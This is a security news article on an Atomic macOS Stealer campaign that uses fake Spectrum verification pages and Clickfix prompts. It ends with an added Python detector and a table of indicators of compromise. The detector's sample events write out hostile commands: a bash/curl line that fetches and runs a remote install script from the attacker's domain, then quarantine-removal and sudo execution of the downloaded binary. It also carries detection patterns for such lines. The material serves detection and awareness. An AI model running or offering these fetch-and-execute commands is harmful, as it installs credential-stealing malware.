
AMOS macOS Stealer Leverages Clickfix to Evade Security Measures and Deploy Malware


Researchers have discovered a new Atomic macOS Stealer (AMOS) variant campaign that exploits typo-squatted domains mimicking Spectrum, the prominent U.S. telecom provider.

The attackers orchestrate this campaign using the Clickfix method, a social engineering strategy notorious for manipulating users into running terminal commands under the guise of identity or security verification.

The campaign stands out for deploying differentiated payloads based on the victim’s operating system, making it both versatile and dangerous.

On Windows endpoints, unsuspecting users are encouraged to copy a PowerShell command, which downloads and executes a remote script.

For macOS victims, the attack is especially insidious. Once the user clicks “Alternative Verification,” a Bash command fetches a malicious shell script directly from a fraudulent domain.

The script is designed to extract the user’s system password through a repeated prompt loop, verifying the input against macOS directory services using legitimate dscl checks.

A valid credential is then stored locally before the script silently downloads and runs an AMOS variant binary, using built-in macOS commands such as xattr and sudo to subvert Gatekeeper and other endpoint protections.

Poor Infrastructure Hints at Rushed Campaign

Analysis of the campaign’s delivery pages revealed a series of programming oversights, such as inconsistent instructions that mismatched the user’s platform.

[Figure: Clickfix-themed delivery websites]

Some delivery sites, for instance, prompted both Windows and Mac users to “Press & hold the Windows Key + R,” reflecting a lack of tailored logic and suggesting the infrastructure was hastily assembled.

Further scrutiny of the web source code uncovered Russian-language comments, reinforcing the likelihood of involvement by Russian-speaking cybercriminals.

Attribution efforts tied together numerous infrastructure elements, including command-and-control (C2) domains and distribution portals, some of which have been highlighted as indicators of future attacks.

Multifaceted Impact

The campaign’s consequences extend beyond credential theft. Attackers gaining access to macOS user passwords could potentially compromise corporate VPNs, internal communication tools, and high-value enterprise resources.

By executing native macOS utilities, the malware diminishes the effectiveness of traditional endpoint protection platforms, lowering detection rates.

The credentials and access harvested may be sold to access brokers on cybercriminal marketplaces or leveraged for subsequent attacks, such as ransomware deployment or sensitive data exfiltration.

The emergence of AMOS variants, including “Poseidon” and “Odyssey,” underscores a trend of increasingly sophisticated infostealer families targeting macOS.

According to the CloudSEK report, their ability to adapt, evade, and persist across multiple platforms makes them a critical threat vector for both corporate and individual users.

Given the sophistication of the campaign, security experts recommend prioritizing user awareness programs to educate staff about the dangers of following instructions presented as system prompts.

Hardening macOS endpoints through strict execution policies, routine monitoring for abnormal password and sudo activities, and hunting for AMOS indicators of compromise remain essential strategies to disrupt such attack chains.
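As an added example (not code from the article or the CloudSEK report), the detector below applies the monitoring advice above to a constructed process-execution log: it flags remote-script execution via curl, a burst of dscl authonly password checks from one parent, a quarantine-attribute removal followed by sudo execution of the same file, and contact with the domains listed in the IoC table. The event format and every sample event are constructed for this example.

```python
import re
from collections import defaultdict

# Defanged domains taken from the article's IoC table.
IOC_DOMAINS = {"applemacios[.]com", "cf-verifi.pages[.]dev",
               "panel-spectrum[.]net", "spectrum-ticket[.]net", "rugmel[.]cat"}
# Shell invoked with -c around a curl fetch, or curl piped straight into a shell.
REMOTE_EXEC = re.compile(r"\b(bash|sh|zsh)\s+-c\b.*\bcurl\b|\bcurl\b.*\|\s*(bash|sh|zsh)\b")
AUTHONLY = re.compile(r"\bdscl\b.*\bauthonly\b")
DEQUARANTINE = re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\s+(\S+)")
SUDO_EXEC = re.compile(r"\bsudo\s+(\S+)")

# Constructed events: (timestamp, parent process, command line).
SAMPLE_EVENTS = [
    ("10:00:01", "Terminal", 'bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"'),
    ("10:00:03", "bash", "dscl . authonly jdoe wrongpass1"),
    ("10:00:05", "bash", "dscl . authonly jdoe wrongpass2"),
    ("10:00:08", "bash", "dscl . authonly jdoe correcthorse"),
    ("10:00:09", "bash", "curl -s -o /tmp/update https://applemacios[.]com/getrur/update"),
    ("10:00:10", "bash", "xattr -c /tmp/update"),
    ("10:00:11", "bash", "sudo /tmp/update"),
    ("11:15:00", "Terminal", "xattr -l ~/Downloads/report.pdf"),  # benign admin use
]

def detect(events, authonly_threshold=3):
    """Return (rule, evidence) findings for a list of (time, parent, cmdline) events."""
    findings = []
    authonly_by_parent = defaultdict(int)   # repeated password checks per parent
    dequarantined = set()                   # paths whose quarantine flag was removed
    for ts, parent, cmd in events:
        for domain in IOC_DOMAINS:
            if domain in cmd:
                findings.append(("ioc_domain", f"{ts} {domain}"))
        if REMOTE_EXEC.search(cmd):
            findings.append(("remote_script_exec", f"{ts} {cmd}"))
        if AUTHONLY.search(cmd):
            authonly_by_parent[parent] += 1
            if authonly_by_parent[parent] == authonly_threshold:  # fire once per parent
                findings.append(("password_prompt_loop", f"{ts} parent={parent}"))
        m = DEQUARANTINE.search(cmd)
        if m:
            dequarantined.add(m.group(2))
        m = SUDO_EXEC.search(cmd)
        if m and m.group(1) in dequarantined:
            findings.append(("sudo_after_dequarantine", f"{ts} {m.group(1)}"))
    return findings

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:24} {evidence}")
```

The chained rule (dequarantine then sudo on the same path) is the one least likely to fire on ordinary admin activity; tune authonly_threshold to the environment's normal dscl usage.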

Indicators of Compromise (IOCs)

Indicator Type | Value | Use
Domain | panel-spectrum[.]net | Clickfix delivery
Domain | spectrum-ticket[.]net | Clickfix delivery
Domain | cf-verifi.pages[.]dev | Command and control
Domain | applemacios[.]com | Command and control
MD5 hash | eaedee8fc9fe336bcde021bf243e332a | AMOS variant
URL | https://cf-verifi.pages[.]dev/i.txt | Contacted URL
URL | https://applemacios[.]com/getrur/install.sh | Contacted URL
URL | https://applemacios[.]com/getrur/update | Contacted URL
Domain | rugmel[.]cat | Clickfix indicator (future)
